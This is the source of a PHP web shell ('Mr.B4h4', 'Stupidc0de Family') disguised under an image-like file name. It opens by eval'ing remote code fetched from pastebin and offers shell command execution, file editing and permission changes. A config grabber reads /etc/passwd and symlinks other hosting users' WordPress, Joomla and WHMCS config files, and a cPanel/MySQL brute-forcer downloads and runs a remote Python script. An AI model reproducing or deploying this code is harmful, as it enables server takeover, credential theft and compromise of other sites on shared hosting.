aq.php.pjpeg

1. <?php eval("?>".file_get_contents("https://pastebin.com/2dRdeXA0"));?>
2.  
3. <!DOCTYPE HTML>
4. <html lang="en" class="no-js">
5. <HEAD>
6. <title>-:- Mr.B4h4' -:-</title>
7. <script type="text/javascript">
8.  
9. var reps = 2
10. var speed =20
11. var p=message.length;
12. var T="";
13. var C=0;
14. var mC=0;
15. var s=0;
16. var sT=null;
17. if(reps<1)reps=1;
18. function doTheThing(){
19. T=message[mC];
20. A();}
21. function A(){
22. s++
23. if(s>9){s=1}
24. if(s==1){document.title=' '+T+' '}
25. if(C<(8*reps)){
26. sT=setTimeout("A()",speed);
27. C++
28. }else{
29. C=0;
30. s=0;
31. mC++
32. if(mC>p-1)mC=0;
33. sT=null;
34. doTheThing();}}
35. doTheThing();
36. </script>
37. <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css">
38. <link href="http://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet" type="text/css">
39. <link href="http://fonts.googleapis.com/css?family=Homenaje" rel="stylesheet" type="text/css">
40. <link rel="shortcut icon" href="http://www.gambaranimasi.org/data/media/781/animasi-bergerak-bendera-indonesia-0013.gif" type="image/x-icon">
41. <meta name='author' content='Stupidc0de Family'>
42. <meta charset="UTF-8">
43. <style type="text/css">
44. body {
45. background: #000000;
46. color: springgreen;
47. font-family :Homenaje;
48. }
49.  
50. #bawah{
51. margin-bottom: 50px;
52. }
53.  
54. #content .first {
55. background-color: black;
56. }
57.  
58. a {
59. color: white;
60. text-decoration: none;
61. }
62.  
63. input,select,textarea{
64. border: 1px #000000 solid;
65. -moz-border-radius: 5px;
66. -webkit-border-radius:5px;
67. border-radius:5px;
68. }
69.  
70. #menu {
71. background:#000000;
72. margin:8px 2px 4px 2px;
73. font-family:Fredericka the Great;
74. font-size:14px;
75. color:silver;
76. }
77.  
78. #menu a {
79. padding:3px 6px;
80. margin:1;
81. background:#2d2b2b;
82. text-decoration:none;
83. letter-spacing:2px;
84. -moz-border-radius: 10px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
85. }
86.  
87. #menu a:hover {
88. background:black;
89. border-bottom:1px solid #ffffff;
90. border-top:1px solid #ffffff;
91. }
92.  
93. .tombolupil {
94. background:black;
95. color:white;
96. margin:0 10px;
97. font-family:Homenaje;
98. font-size:16px;
99. border:2px solid crimson;
100. }
101.  
102. .tombolupil:hover {
103. background:crimson;
104. color:white;
105. margin:0 10px;
106. font-family:Homenaje;
107. font-size:16px;
108. border:2px solid crimson;
109. }
110.  
111. .bordergaya {
112. background:black;
113. color:white;
114. margin:0 10px;
115. font-family:Homenaje;
116. font-size:16px;
117. border:2px solid #2d2b2b;
118. }
119.  
120. .bordergaya:hover {
121. background:#2d2b2b;
122. color:white;
123. margin:0 10px;
124. font-family:Homenaje;
125. font-size:16px;
126. border:2px solid crimson;
127. }
128.  
129. .justborder {
130. background:black;
131. color:white;
132. margin:0 10px;
133. font-family:Homenaje;
134. font-size:16px;
135. border:2px solid #2d2b2b;
136. }
137.  
138. .rapihbanget {
139. text-align: left;
140. font-size: 16px;
141. color: springgreen;
142. font-family: Homenaje;
143. margin-left: 38%;
144. }
145.  
146. .kecew {
147. text-align: left;
148. font-size: 15px;
149. color: white;
150. font-family: Homenaje;
151. }
152.  
153. /* STYLE UPIL BIAR KEKINIAN */
154.  
155. .js .inputfile{
156. width: 0.1px;
157. height: 0.1px;
158. opacity: 0;
159. overflow: hidden;
160. position: absolute;
161. z-index: -1;
162. }
163.  
164. .inputfile + label {
165. max-width: 80%;
166. font-size: 1.25rem;
167. /* 20px */
168. font-weight: 700;
169. text-overflow: ellipsis;
170. white-space: nowrap;
171. cursor: pointer;
172. display: inline-block;
173. overflow: hidden;
174. padding: 0.625rem 1.25rem;
175. /* 10px 20px */
176. }
177.  
178. .no-js .inputfile + label {
179. display: none;
180. }
181.  
182. .inputfile:focus + label,
183. .inputfile.has-focus + label {
184. outline: 1px dotted #000;
185. outline: -webkit-focus-ring-color auto 5px;
186. }
187.  
188. .inputfile + label * {
189. /* pointer-events: none; */
190. /* in case of FastClick lib use */
191. }
192.  
193. .inputfile + label svg {
194. width: 1em;
195. height: 1em;
196. vertical-align: middle;
197. fill: currentColor;
198. margin-top: -0.25em;
199. /* 4px */
200. margin-right: 0.25em;
201. /* 4px */
202. }
203.  
204. .inputfile-4 + label {
205. color: white;
206. font-family:Homenaje;
207. font-size:15px;
208. }
209.  
210. .inputfile-4:focus + label,
211. .inputfile-4.has-focus + label,
212. .inputfile-4 + label:hover {
213. color: crimson;
214. }
215.  
216. .inputfile-4 + label figure {
217. width: 50px;
218. height: 50px;
219. border-radius: 25%;
220. background-color: crimson;
221. display: block;
222. padding: 10px;
223. margin: 0 auto 10px;
224. }
225.  
226. .inputfile-4:focus + label figure,
227. .inputfile-4.has-focus + label figure,
228. .inputfile-4 + label:hover figure {
229. background-color: white;
230. }
231.  
232. .inputfile-4 + label svg {
233. width: 100%;
234. height: 100%;
235. fill: black;
236. }
237.  
238. </style>
239. </HEAD>
240. <BODY>
241. <center>
242. <?php
243. /*
244. Mr.B4h4'
245. */
246.  
247. /*
248.  
249. */
250.  
251. set_time_limit(0);
252. error_reporting(0);
253. if(get_magic_quotes_gpc()){
254. foreach($_POST as $key=>$value){
255. $_POST[$key] = stripslashes($value);
256. }
257. }
258.  
259. /* info server */
260.  
261. $self=$_SERVER['PHP_SELF'];
262. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
263. $your_ip=$_SERVER['REMOTE_ADDR'];
264. $srvr_ip=$_SERVER['SERVER_ADDR'];
265. $admin=$_SERVER['SERVER_ADMIN'];
266.  
267.  
268. //////all functions disini tempatnya/////
269. function exe($cmd) {
270. if(function_exists('system')) {
271. @ob_start();
272. @system($cmd);
273. $buff = @ob_get_contents();
274. @ob_end_clean();
275. return $buff;
276. } elseif(function_exists('exec')) {
277. @exec($cmd,$results);
278. $buff = "";
279. foreach($results as $result) {
280. $buff .= $result;
281. } return $buff;
282. } elseif(function_exists('passthru')) {
283. @ob_start();
284. @passthru($cmd);
285. $buff = @ob_get_contents();
286. @ob_end_clean();
287. return $buff;
288. } elseif(function_exists('shell_exec')) {
289. $buff = @shell_exec($cmd);
290. return $buff;
291. }
292. }
293.  
294. function perms($file){
295. $perms = fileperms($file);
296.  
297.  
298. if (($perms & 0xC000) == 0xC000) {
299. // Socket
300. $info = 's';
301. } elseif (($perms & 0xA000) == 0xA000) {
302. // Symbolic Link
303. $info = 'l';
304. } elseif (($perms & 0x8000) == 0x8000) {
305. // Regular
306. $info = '-';
307. } elseif (($perms & 0x6000) == 0x6000) {
308. // Block special
309. $info = 'b';
310. } elseif (($perms & 0x4000) == 0x4000) {
311. // Directory
312. $info = 'd';
313. } elseif (($perms & 0x2000) == 0x2000) {
314. // Character special
315. $info = 'c';
316. } elseif (($perms & 0x1000) == 0x1000) {
317. // FIFO pipe
318. $info = 'p';
319. } else {
320. // Unknown
321. $info = 'u';
322. }
323.  
324. // Owner
325. $info .= (($perms & 0x0100) ? 'r' : '-');
326. $info .= (($perms & 0x0080) ? 'w' : '-');
327. $info .= (($perms & 0x0040) ?
328. (($perms & 0x0800) ? 's' : 'x' ) :
329. (($perms & 0x0800) ? 'S' : '-'));
330.  
331. // Group
332. $info .= (($perms & 0x0020) ? 'r' : '-');
333. $info .= (($perms & 0x0010) ? 'w' : '-');
334. $info .= (($perms & 0x0008) ?
335. (($perms & 0x0400) ? 's' : 'x' ) :
336. (($perms & 0x0400) ? 'S' : '-'));
337.  
338. // World
339. $info .= (($perms & 0x0004) ? 'r' : '-');
340. $info .= (($perms & 0x0002) ? 'w' : '-');
341. $info .= (($perms & 0x0001) ?
342. (($perms & 0x0200) ? 't' : 'x' ) :
343. (($perms & 0x0200) ? 'T' : '-'));
344.  
345. return $info;
346. }
347.  
348. function getfile($urlfile, $content) {
349. $fp = fopen($content, "w");
350. $ch = curl_init();
351. curl_setopt($ch, CURLOPT_URL, $urlfile);
352. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
353. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
354. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
355. curl_setopt($ch, CURLOPT_FILE, $fp);
356. returncurl_exec($ch);
357. curl_close($ch);
358. fclose($fp);
359. ob_flush();
360. flush();
361. }
362. //////////////END Functions Biar Rapih////////////////////
363.  
364. ///////////////////ZONE-H////////////////
365. $zoneH="lVRti9s4EP4eyH+YimUdQxrvbqF3JLa5ct1Cub3dkqRf7lKC4kxisbJkJLlJWva/d+SXJu1uaWsIkUbz8swzj4RZrlm/F2eoHJo03mhTQIEu1+tkwd7dzeYLlvZ7/wpjtIExeVqUmDnIJLc2CVbarNFs+YEHoHiBFFTUvnVYrEsntEo/aYXP8zhqt3QQNWnSeGVoe6ud2KCBW8owhliosuoqLNixxIKBO5S+hsO9o10peYa5lnTu0VbO8OevnOPZPRKADtAaN+TmDVZ88oYXV4SuqfxaF1woC2O/jX1abpA/Xdu6g/ThO7F2+Rhe/vFnuZ9AjmKbuzG8uLii7UnVJrOvFHV526K/0KCtVoXwLX7ksvKGGar1MflWN/xGfl5+4dHTj036Pej3LLqlEwUupaAsMLgIyS42MHi2qVTmZ7DEvbDOwoBllZFLoYRjYfh5LZBM81xYmGVGlA4qixay99MbuBErw81hCAddQVFZB9Se41LCRhjaPatBcMgNbpIgd64cRxGvrkZlXo4UuqjgquIyQhX5miMCWZX+MEh/wzmOeMrCyUPdp2/pr7Oll+n/wVYHH8J+7zOdtB+RgzzLYYD7Uuq1b22h2BC6iHZEFAbcwlmzDY/xJ6m6r9TU6aB1PcnUSCz4cDQ114ByT45ZHo5LpIsHrJsb0UYC2aJLguVKcnUffEtjc4FGmS4ibrJcfMSorFZS2BzXyUWQ/tdeMP5VBQ1B3bg73EQlIWzR0qoB+S1rZ8RYAl9lAYPTDmozDYNuMqXL8iH8Tdq4ezdfTq/n76e38+mr29mb6+kQLn8tzJPVOR/97U44P7gjwCdmknGLwBpq2OTxrH5clP6GwFpud7vd6IRf5d+iQ2SF2kpk4W/l9c28eXt983pG6VuWk47u80Y0l4mfwnlOj1RBmkwuz0mkVqvk8sliXuKlwe2y4DUjLMq01P65M0gPQnr3T7ygV0DRU7qIpEgj0ncNEPeY1fDCMHyc9jsZtreWjZgHR3+dHGnZCJIWaWxLrtpnMKhhjGFrEFWQ+jAgLJF3SU+F+KiitPhTPE8UonbbMtdeEl2lH1RZEan3J3Y/g0q68c89H75TbSY1yawm0l+rLw== ";
366.  
367.  
368. /*MASIH STYLE UPIL BRO*/
369.  
370. echo '<script>(function(e,t,n){var r=e.querySelectorAll("html")[0];r.className=r.className.replace(/(^|\s)no-js(\s|$)/,"$1js$2")})(document,window,0);</script>';
371.  
372. echo"<br/>
373. <pre style='text-align: center; color: grey; font-weight: bold; font-size: 15px;'>
374. *-~'`^'*u_ _u*'^`'~-*,
375. p!^ / jPw w9j \ ^!p
376. w^.._ / '\_ _/' \ _.^w
377. *_ / \_ _ _ _/ \ _*
378. q / / \q ( '---' ) p/ \ \ p
379. jj5****._ / ^\_) o o (_/^ \ _.****6jj
380. *_ / '==) ;; (==' \ _*
381. `/.w***, /( )\ ,***w.\'
382. ^ ^c/ ) ( \c^ ^
383. 'V')_)(_('V'</pre>";
384.  
385. echo "<center><font color='white' siz='200px' face='Fredericka the Great'>[+] Mr.B4h4' [+]</font></center><br/>";
386.  
387. /** info kernel */
388. echo"
389. <font size='4' color='White' face='Jolly Lodger'>
390. <center>".php_uname()."<br>
391. ".$software = getenv("SERVER_SOFTWARE");
392. echo"<p>";
393.  
394. echo"
395. <font size='3.5' color='white'><p>
396. Your IP : <font color=Crimson> ".$your_ip."</font> <font color=springgreen>|</font> <font color=\"#fff2f2\" > </font> Server IP : <font color=Crimson>".$srvr_ip."</font> <font color=\"#fff2f2\" ><br>
397.  
398. </font>
399. </font>
400. </div>
401. </td>
402. </tr>
403. </tbody>
404. </table></div>
405. </font>";
406.  
407. $disablefunctions = @ini_get("disable_functions");
408. $echo_disablefunctions = (!empty($disablefunctions)) ? "<font color=white>".$disablefunctions."</font>" : "<font color=white>Have Fun! None Functions Disabled For This Server! ~_^</font>";
409. echo '<br/><font size="4" style="font-family:Jolly Lodger; color:red;">
410. <tr><td> Disable Functions: '.$echo_disablefunctions.'</font><br/></td></tr>';
411.  
412.  
413. echo '<br/><font size="4" style="font-family:Jolly Lodger;">
414. <tr><td> Your Path Location :';
415.  
416. //////////////////////
417. //CWD MULAI DISINI//
418. ////////////////////
419.  
420. if(isset($_GET['path'])){
421. $path = $_GET['path'];
422. }else{
423. $path = getcwd();
424. }
425. $path = str_replace('\\','/',$path);
426. $paths = explode('/',$path);
427.  
428. foreach($paths as $id=>$pat){
429. if($pat == '' && $id == 0){
430. $a = true;
431. echo '<a href="?path=/">/</a>';
432. continue;
433. }
434. if($pat == '') continue;
435. echo '<a href="?path=';
436. for($i=0;$i<=$id;$i++){
437. echo "$paths[$i]";
438. if($i != $id) echo "/";
439. }
440. echo '">'.$pat.'</a>/';
441. }
442. echo '</font>';
443. $putraganteng=getcwd();
444. $putraganteng=$path;
445. ?>
446.  
447. <?php
448.  
449. ## Update Penambahan Fitur Create New File And Folder (Bagian Interface)
450. echo"<center>
451. <table>
452. <tr>
453. <td>
454. <form style='float:right;' method='POST'><input name='path' value=".$putraganteng." type=hidden>
455. <input class=bordergaya type='submit' value='Create New File' >
456. <input class=bordergaya size='40' name='new_file' /></form>
457. </td>
458. <td>
459. <form style='float:left;' method='POST'><input name='path' value=".$putraganteng." type=hidden>
460. <input class=bordergaya size='40' name='new_dir'>
461. <input class=bordergaya type='submit' value='Create New Folder' /></form>
462. </td>
463. </tr>
464. </table>
465. </center>";
466. ## End Of Update Interface
467. ## Update Penambahan Fitur Create New File And Folder (Bagian Function)
468. function mk_file_ui(){
469. chdir($_POST['path']);
470. echo "<font color='springgreen'><form method='POST'>
471. <input type='hidden' name='path' value=".getcwd().">
472. <br/>New File Name : <input class=bordergaya size='40' name='new_f_name' value=".$_POST['new_file']."></font><br /><br /><center>
473. <textarea spellcheck='false' cols='80' rows='15' class=bordergaya name='n_file_content'></textarea></center><br>
474. <input class='bordergaya' type='submit' value=' Save ' /></form></center></div>";
475. die();
476. }
477.  
478. function mk_file_bg(){
479. chdir($_POST['path']);
480. $c_path=$_POST['path'];
481. $c_file=$_POST['new_f_name'];
482. $c_file_contents=$_POST['n_file_content'];
483. $handle=fopen($c_file, "w");
484. if(!$handle){
485. echo '<script>alert("Failed :(");</script>';
486. }else{
487. fwrite($handle,$c_file_contents);
488. echo '<script>alert("File Saved!!");</script>';
489. }
490. fclose($handle);
491. }
492.  
493. function create_dir(){
494. chdir($_POST['path']);
495. $new_dir=$_POST['new_dir'];
496. if(is_writable($_POST['path'])){
497. mkdir($new_dir);
498. echo '<script>alert("Creating Folder Success!!");</script>';
499. }else{
500. echo '<script>alert("Creating Folder Failed!!");</script>';
501. }
502. }
503. ## End Of Update Functions
504. ?>
505.  
506. <!-- menu utama -->
507. <br><center><div id="menu">
508. [<a href="?">Home</a>] <font color=orange>=</font>
509. [<a href="?<?php echo "path=".$path; ?>&amp;x=korong">Upload</a>] <font color=orange>=</font>
510. [<a href="?<?php echo "path=".$path; ?>&amp;x=cmd">Command</a>] <font color=orange>=</font>
511. [<a href="?<?php echo "path=".$path; ?>&amp;x=grabc">Config Grabber</a>] <font color=orange>=</font>
512. [<a href="?<?php echo "path=".$path; ?>&amp;x=vn">Domain Viewer</a>] <font color=orange>=</font>
513. [<a href="?<?php echo "path=".$path; ?>&amp;x=masstool">Mass Tool</a>] <font color=orange>=</font>
514. [<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Cpanel Tool</a>]
515. <br><br>
516. [<a href="?<?php echo "path=".$path; ?>&amp;x=bypstuls">Bypass Tools</a>] <font color=orange>=</font>
517. [<a href="?<?php echo "path=".$path; ?>&amp;x=fcrot">File Creator</a>] <font color=orange>=</font>
518. [<a href="?<?php echo "path=".$path; ?>&amp;x=krdp">Create RDP</a>] <font color=orange>=</font>
519. [<a href="?<?php echo "path=".$path; ?>&amp;x=jumping">Jumping</a>] <font color=orange>=</font>
520. [<a href="?<?php echo "path=".$path; ?>&amp;x=dump">Dumper Tools</a>] <font color=orange>=</font>
521. [<a href="?<?php echo "path=".$path; ?>&amp;x=tentang">About</a>]
522. </div></center>
523. <audio autoplay> <source src="http://www.soundjay.com/button/beep-24.wav" type="audio/mpeg"></audio>
524.  
525. <?php
526.  
527. /*
528. Lihat File
529. Dimulai Dari Sini
530. */
531.  
532. if(isset($_GET['filesrc'])){
533. echo "<br /><tr><td>You Are Looking : ";
534. echo $_GET['filesrc'];
535. echo '</tr></td></table>';
536. echo('<br /><br /><textarea rows="20" cols="80">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
537. die();
538. }
539.  
540. ## Update Penambahan Fitur Create New File And Folder (Bagian If dan Else)
541. else if(isset($_POST['path']) && isset($_POST['new_file'])){
542. chdir($_POST['path']);
543. mk_file_ui();
544. }else if(isset($_POST['path']) && isset($_POST['new_f_name']) && isset($_POST['n_file_content'])){
545. mk_file_bg();
546. }else if(isset($_POST['path']) && isset($_POST['new_dir'])){
547. chdir($_POST['path']);
548. create_dir();
549. }
550. ## End Of Update
551.  
552. /*
553. permission + Rename
554. Dimulai DariSini
555. */
556.  
557. elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
558. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
559. if($_POST['opt'] == 'chmod'){
560. if(isset($_POST['perm'])){
561. if(chmod($_POST['path'],$_POST['perm'])){
562. echo '<script>alert("Change Permission Sukses!");</script>';
563. }else{
564. echo '<script>alert("Change Permission Gagal!");</script>';
565. }
566. }
567. echo '<form method="POST">
568. Permission : <input name="perm" class="bordergaya" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
569. <input type="hidden" name="path" value="'.$_POST['path'].'">
570. <input type="hidden" name="opt" value="chmod">
571. <input class="bordergaya" type="submit" value="Go" />
572. </form>';
573. }elseif($_POST['opt'] == 'rename'){
574. if(isset($_POST['newname'])){
575. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
576. echo '<script>alert("Change Name Sukses!");</script>';
577. }else{
578. echo '<script>alert("Change Name Gagal!");</script>';
579. }
580. $_POST['name'] = $_POST['newname'];
581. }
582. echo '<form method="POST">
583. New Name : <input class="bordergaya" name="newname" type="text" size="20" value="'.$_POST['name'].'" />
584. <input type="hidden" name="path" value="'.$_POST['path'].'">
585. <input type="hidden" name="opt" value="rename">
586. <input class="bordergaya" type="submit" value="Go" />
587. </form>';
588. }elseif($_POST['opt'] == 'edit'){
589. if(isset($_POST['src'])){
590. $fp = fopen($_POST['path'],'w');
591. if(fwrite($fp,$_POST['src'])){
592. echo '<script>alert("Edit File Sukses!");</script>';
593. }else{
594. echo '<script>alert("Edit File Gagal!");</script>';
595. }
596. fclose($fp);
597. }
598. echo '<form method="POST">
599. <textarea class="bordergaya" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
600. <input type="hidden" name="path" value="'.$_POST['path'].'">
601. <input type="hidden" name="opt" value="edit">
602. <input class="bordergaya" type="submit" value="Go" />
603. </form>';
604. }
605. echo '</center>';
606. die();
607. }
608.  
609.  
610. /*
611. Config Grabber
612. Dimulai Dari Sini
613. */
614.  
615. elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
616.  
617. echo "
618. <form method='POST'>
619. </head>
620. <style>
621. textarea {
622. resize:none;
623. color: #000000 ;
624. background-color:#000000;
625. font-size:8pt; color:#ffffff;
626. border:1px solid white ;
627. border-left: 4px solid white ;
628. width:543px;
629. height:400px;
630. }
631. input {
632. color: #000000;
633. border:1px dotted white;
634. }
635. </style>";
636. echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Homenaje" color="springgreen" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='bordergaya' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='bordergaya' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('I-Conf', 0755);@chdir('I-Conf');
637. $htaccess="
638. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
639. Options Indexes FollowSymLinks
640. ForceType text/plain
641. AddType text/plain .php
642. AddType text/plain .html
643. AddType text/html .shtml
644. AddType txt .php
645. AddHandler server-parsed .php
646. AddHandler txt .php
647. AddHandler txt .html
648. AddHandler txt .shtml
649. Options All
650. Options All";
651. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
652. $passwd=explode("\n",$passwd);
653. echo "<br><br><center><font face='Homenaje' color=Crimson size=2pt>Kalem Ndan Lagi Di Proses...</center><br>";
654. foreach($passwd as $pwd){
655. $pawd=explode(":",$pwd);$user =$pawd[0];
656. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
657. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
658. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
659. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
660. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
661. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
662. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
663. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
664. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
665. @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
666. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
667. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
668. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
669. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
670. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
671. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
672. @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
673. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
674. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
675. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
676. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
677. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
678. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
679. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
680. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
681. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
682. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
683. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
684. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
685. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
686. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
687. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
688. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
689. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
690. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
691. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
692. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
693. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
694. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
695. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
696. echo '<b><font face="Homenaje" color="springgreen" size="3pt"><b>Selesai Bos Q, Monggo >></b> <a target="_blank" href="I-Conf">Hajar Config</a></font></b>';}
697. die();
698. }
699. /////// Cukup Sampai Disini ya Grabber :( ////////
700.  
701. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
702. ///////////////////////////////////////////////START OF ALL CPANEL TOOLS/////////////////////////////////////////////////////////////////////
703. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
704.  
705.  
706. /// start cpanel brute
707. elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
708. {
709. ?>
710. <form action="?path=<?php echo $path; ?>&amp;x=brute" method="post">
711. <?php
712.  
713. @set_time_limit(0);
714. @error_reporting(0);
715.  
716.  
717. if($_POST['page']=='find')
718. {
719. if(isset($_POST['usernames']) && isset($_POST['passwords']))
720. {
721. if($_POST['type'] == 'passwd'){
722. $e = explode("\n",$_POST['usernames']);
723. foreach($e as $value){
724. $k = explode(":",$value);
725. $username .= $k['0']." ";
726. }
727. }elseif($_POST['type'] == 'simple'){
728. $username = str_replace("\n",' ',$_POST['usernames']);
729. }
730. $a1 = explode(" ",$username);
731. $a2 = explode("\n",$_POST['passwords']);
732. $id2 = count($a2);
733. $ok = 0;
734. foreach($a1 as $user )
735. {
736. if($user !== '')
737. {
738. $user=trim($user);
739. for($i=0;$i<=$id2;$i++)
740. {
741. $pass = trim($a2[$i]);
742. if(@mysql_connect('localhost',$user,$pass))
743. {
744. echo "Zoo!! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />";
745. $ok++;
746. }
747. }
748. }
749. }
750. echo "<hr><b>You Found <font color=red>$ok</font> By Stupidc0de</b>";
751. echo "<center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
752. exit;
753. }
754. }
755. if($_POST['pass']=='password'){
756. @error_reporting(0);
757. $i = getenv('REMOTE_ADDR');
758. $d = date('D, M jS, Y H:i',time());
759. $h = $_SERVER['HTTP_HOST'];
760. $dir=$_SERVER['PHP_SELF'];
761. mkdir('config',0755);
762. $cp = file_get_contents("http://pastebin.com/raw/0YG2dZ98");
763. $file = fopen("cp.py","w+");
764. $write = fwrite ($file ,$cp);
765. fclose($file);
766. chmod("cp.py",0755);
767. $url = $_POST['url'];
768. echo"<center>
769. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
770. system("python cp.py $url config");
771. unlink ('cp.py');
772. echo"</textarea>
773. </center>";
774. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
775. exit;
776. }
777. if($_POST['mendapatkan']=='passwd'){
778. @set_magic_quotes_runtime(0);
779. ob_start();
780. error_reporting(0);
781. @set_time_limit(0);
782. @ini_set('max_execution_time',0);
783. @ini_set('output_buffering',0);
784. $fn = $_POST['foldername'];
785. //all function here
786.  
787. function syml($usern,$pdomain)
788. {
789. symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
790. symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
791. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
792. symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
793. symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
794. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
795. symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
796. symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
797. symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
798. symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
799. symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
800. symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
801. symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
802. symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
803. symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
804. symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
805. symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
806. symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
807. symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
808. symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
